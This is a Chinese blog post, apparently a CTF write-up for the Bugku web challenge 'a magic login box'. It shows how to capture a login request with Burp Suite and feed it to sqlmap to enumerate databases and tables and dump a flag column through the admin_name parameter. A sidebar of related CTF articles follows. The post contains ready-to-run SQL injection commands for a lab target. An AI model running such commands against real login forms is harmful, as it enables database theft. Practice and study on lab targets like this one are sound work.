bugku-Web这是一个神奇的登陆框(sqlmap+bp)

最新推荐文章于 2024-08-03 22:24:31 发布
最新推荐文章于 2024-08-03 22:24:31 发布
阅读量1k 收藏 1
点赞数
分类专栏: Bugku sql注入 一些流批方法 文章标签: bugku sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zz_Caleb/article/details/84980745
版权

根据url提示是让sql注入,但万能密码又无效,这里我们用sqlmap+bp来解题。

首先输入用户密码来登录用bp抓包:

 如图将其保存到txt文件中,然后用SQLmap来注入

输入命令暴库:sqlmap.py -r "1.txt" -p admin_name --dbs(我将1.txt和sqlmap保存在同一个文件夹下了)

-p为注入点,就是admin_name ;r为读文件

会发现出来两个数据库,而我们需要的是bugkusql1,

然后暴表:sqlmap.py -r "1.txt" -D bugkusql1 -p admin_name --tables

爆出了flag1表,

然后爆列名:sqlmap.py -r "D:\1.txt" -D bugkusql1 -T flag1 -p admin_name --dbs

爆出了flag1列

然后爆字段:sqlmap.py -r "1.txt" -D bugkusql1 -T flag1 -C flag1 -p admin_name --dump

就拿到flag了。

 

如果你照这个步骤注入失败了,尝试提高level等级进行注入。

大千SS
关注
专栏目录
bugkuctf解题-WEB
05-04
在CTF(Capture The Flag)比赛中,Web安全领域是一个重要的环节,它涵盖了各种网络安全技能,如漏洞挖掘、代码审计、Web应用渗透测试等。本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验...
sqlmap查找SQL注入漏洞入门
weixin_30332705的博客
11-21 1073
1、安装sqlmap sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。注意:sqlmap只是用来检测和利用sql注入点的,使用前请先使用扫描工具扫出sql注入点。 它由python语言开发而成,因此运行需要安装python环境。它依赖于python 2.x ,请不要安装python 3.x 1.1 安装pyhon 在Windows上安装Python ...
bugku bp (writeup)
m0_55383382的博客
12-11 1198
flag是:flag{b9a7f1f648d782370e736c63c063d71a}把刚才下载的top1000.txt导入进去。这边我发现长度都一样,找不到正确密码。我发现zxc123这一项没有打勾✔。提示说是弱密码top1000。选择 发送给Intruder。所以我怀疑这个是密码。
【CTF WEB基础】BP - Bugku CTF
最新发布
yu_fly_fish的博客
08-03 324
一起变强!
bugku-bp
2202_75317918的博客
03-02 396
bugku bp
手工注入和BurpSuite入门-web安全
gaogzhen的博客
08-10 1144
1、手工注入 具体的手工注入步骤可以参考之前写的博文:SQL注入基础步骤及SQLMap工具使用(一) 这里我们以墨者学院->在线靶场->web安全->SQL注入->SQL手工注入漏洞测试(MySQL数据库)为例,重新复习一下,重点是: 查询注入点 注入步骤 启动靶场,图示: 分析: 登录用于输入账号密码可能出现的漏洞为弱密码口令 当鼠标放在下面灰色横条时,出现通知提示,切可点击,有可疑,点击进入 进入后,图示: 按照通常的注入步骤一步一步来: 判断是否存在注入,并寻找注入点
Bugku bp超详解
m0_74997436的博客
10-23 482
因为code是success.php页面的参数,因此在登录页面当使用正确密码时,code的值(r.code)应该与'bugku10000'不同,进而r的值也与{code: 'bugku10000'}不同。找到返回包不含有{code: 'bugku10000'}的,就可能是使用正确的密码。这里它自动认为“admin"和"123456"都是需要爆破的地址,但题目已经给出用户名,所以我们就需要手动取消admin的选。也就是说,如果我们输入正确的密码,返回页面的r将不是{code: 'bugku10000'}。
使用sqlmap+burpsuite进行中级sql注入
06-01
在本例中,我们使用DVWA(Damn Vulnerable Web Application)作为靶场,其SQL Injection模块为我们提供了一个理想的注入点。访问DVWA并尝试提交可能导致SQL注入的参数,如`sql-injection`页面的`id`参数。 3. **...
sqlmap+python2.7.1
10-16
本压缩包“sqlmap+python2.7.1”显然是为了方便用户在没有Python环境或需要特定版本Python的系统上运行SQLMap而准备的。 SQLMap的核心功能在于自动化探测和利用SQL注入漏洞,这些漏洞通常出现在网站后端数据库管理...
Linux系统设计-sqlmap4burp++是一款兼容Windows,mac,linux多个系统平台的联动插件
01-10
继承了Unix以网络为核心的设计思想,是一个性能稳定的多用户网络操作系统,Linux是许多企业和服务提供商的首选操作系统,用于部署Web服务器、数据库服务器、邮件服务器等。Linux系统具有高效的网络功能和稳定的...
SQLMAP安装工具(SQLMAP+Python2.7.15)
11-23
SQLMAP安装工具(含:SQLMAP+Python2.7.15);以下是参考资料 sqlmap防注入软件安装: https://jingyan.baidu.com/article/86112f13b976e92736978749.html sqlmap防注入案例: ...sqlmap基本用法: ...
sqlmap的两种挂代理方式
热门推荐
weixin_51519028的博客
07-20 1万+
sqlmap代理配置
Sqlmap使用指南
Ays.Ie的博客
03-02 1279
该篇记录sqlmap的常用方式
bugku bp
m0_62709637的博客
07-04 1363
bugku bp
这是一个神奇的登录Bugku-web题 使用sqlmap注入实例)
Risker
03-14 1万+
正在学习sqlmap,拿这个题先入门一下。题目链接:http://120.24.86.145:9001/sql/先看下源代码:是post提交,url明显提示是个sql注入,由于post提交,要sql和burp结合起来使用。首先burp抓包,抓到包后选择存到txt文件中:(随便输入账号密码)我保存到了D盘的1.txt里。然后打开sqlmap,输入指令:sqlmap.py -r "D:\1.txt" ...
关于用bpsqlmap工具等做出sql注入一种方法
weixin_43326436的博客
06-08 1478
1.工具 sqlmapbp 2.步骤 将bp抓到的包的数据,复制到txt文档中,打开sqlmap。 爆库命令:python2 sqlmap.py -r ***.txt --dbs 依次爆表等 例如: python2 sqlmap.py -r 1.txt --dbs python2 sqlmap.py -r 1.txt -D 爆出的库名 --tables python2 sqlmap.py -r 1.txt -D 爆出的酷库名 -T 爆出的表名 --columns python2 sqlmap.py -r
bugku-bp题解
qq_51775369的博客
10-14 2353
根据题目提示,这道题应该是一个暴力破解的题目。并且使用的字典是top1000的字典。根据提示z????? 猜测应该是一个以z开头的6位密码 top1000字典下载链接:top1000.txt · 朽木/PasswordDic - Gitee.com 打开网址,已知用户名是admin求密码 使用Burpsuite进行抓包 ...
bugku 一个神奇登陆--POST型SQL注入
a1004070060的博客
06-29 799
解题链接:http://123.206.87.240:9001/sql/ 解题过程: 本题并未给出什么提示,首先考虑到弱口令登录,BP抓包后加载send to intruder,加载字典后爆破无果。然后考虑到之前做的题目,尝试用御剑扫描一下后台,也没发现什么线索,这时才注意到页面的title,原来这道题目与SQL注入相关,考虑到user和pass字段都是通过post方法传递,所以本题应...
Bugku-web题,ctf模拟题sql注入神奇登陆
嘟的博客
09-30 1584
title: Bugku-web题,ctf模拟题sql注入神奇登陆 tags: web破解 categories: 渗透测试 这是Bugku-web题,地址为http://123.206.87.240:9001/sql/ 登陆网站,打开burp进行截断,账号密码随便打,burp截取后进行保存。 使用sqlmap自动注入,可以发现数据库版本,数据库名 使用sqlmap自动注入,发现表...
快速搭建Web攻防Sqli-lab环境:PhpStudy、Firefox插件与Sqlmap安装指南
接着,为了提升浏览器的安全性,我们推荐安装Mozilla Firefox,这是一个流行的开源浏览器,使用Gecko渲染引擎,支持多种操作系统。在安全方面,我们安装了几款插件:Hackbar(用于测试网站的安全性)、Firebug...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值